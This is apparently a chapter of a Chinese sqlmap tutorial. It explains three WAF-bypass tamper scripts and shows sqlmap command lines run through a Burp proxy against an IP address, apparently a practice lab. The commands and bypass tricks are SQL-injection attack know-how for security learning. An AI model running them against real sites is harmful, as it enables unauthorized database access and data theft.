sqlmap从入门到精通-第七章-7-17 绕过WAF脚本-randomcomments.py&space2comment.py
35. randomcomments.py脚本
在payload关键字中随机插入/**/,可以绕过关键字过滤,适用于所有数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcomments.py" --proxy="http://127.0.0.1:8080" -batch
并未注入成功,看看burp抓包的效果
效果已经有了针对关键的payload增加/**/
=====================================================================================================================================
36. securesphere.py脚本
添加经过特殊构造的字符串,在payload后面加入字符串,据说是可以自定义的,适用于所有数据库
实战演示:
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="securesphere.py" --proxy="http://127.0.0.1:8080" -batch
新版本的sqlmap已经不存在这个
====================================================================================================================================
37. space2comment.py脚本
使用/**/替换空格符,主要用于空格的绕过
测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2comment.py" --proxy="http://127.0.0.1:8080" -batch
发现是可以注入的,看看burp抓包情况